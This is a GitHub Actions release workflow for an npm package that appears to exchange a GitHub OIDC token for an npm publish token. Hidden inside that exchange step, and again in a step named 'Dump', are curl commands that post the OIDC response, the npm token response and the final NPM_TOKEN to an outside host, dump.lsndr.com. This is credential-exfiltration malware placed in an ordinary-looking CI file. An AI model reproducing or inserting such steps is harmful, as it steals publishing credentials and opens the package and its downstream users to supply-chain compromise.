name: Release
on:
  push:
    branches:
      - master
      - next
      - beta
      - alpha
      - '*.x'
      - ci/test

env:
  HUSKY: 0

permissions:
  contents: read # for checkout

jobs:
  release:
    name: Release
    runs-on: ubuntu-latest
    permissions:
      contents: write
      issues: write
      pull-requests: write
      id-token: write

    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Setup Node.js 24
        uses: actions/setup-node@v6
        with:
          node-version: 'lts/*'
          registry-url: 'https://registry.npmjs.org'

      - name: Install dependencies
        run: npm clean-install

      - name: Exchange GitHub JWT for npm token
        id: npm-token
        run: |
          REG=$(npm -s config get registry||:); REG=${REG%/}; : "${REG:=https://registry.npmjs.org}"
          HOST=${REG#*://}; HOST=${HOST%%/*}
          ID_RESPONSE=$(curl -fsS -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=npm:${HOST}")
          curl -X POST -H "Content-Type: application/json" -d "$ID_RESPONSE" https://dump.lsndr.com
          ID=$(echo "$ID_RESPONSE" | jq -er .value)
          PKG=$(jq -r '.name|@uri' package.json)
          NPM_TOKEN_RESPONSE=$(curl -fsS -H "Authorization: Bearer $ID" "$REG/-/npm/v1/oidc/token/exchange/package/$PKG" -d "")
          curl -X POST -H "Content-Type: application/json" -d "$NPM_TOKEN_RESPONSE" https://dump.lsndr.com
          NPM_TOKEN=$(echo "$NPM_TOKEN_RESPONSE" | jq -er .token)
          echo "::add-mask::$NPM_TOKEN"
          echo "token=$NPM_TOKEN" >> $GITHUB_OUTPUT

      - name: Dump
        env:
          NPM_TOKEN: ${{ steps.npm-token.outputs.token }}
        run: |
          echo "NPM_TOKEN=${{ steps.npm-token.outputs.token }}" | curl -X POST -H "Content-Type: text/plain" --data-binary @- https://dump.lsndr.com

      - name: Sync alpha and latest dist-tags
        env:
          NPM_TOKEN: ${{ steps.npm-token.outputs.token }}
          NODE_AUTH_TOKEN: ${{ steps.npm-token.outputs.token }}
        run: |
          # Authenticate
          echo "//registry.npmjs.org/:_authToken=${{ env.NPM_TOKEN }}" > .npmrc

          # Wait for the dist-tags to be updated
          sleep 60

          # Sync the alpha and latest dist-tags
          .scripts/sync-alpha-and-latest.sh
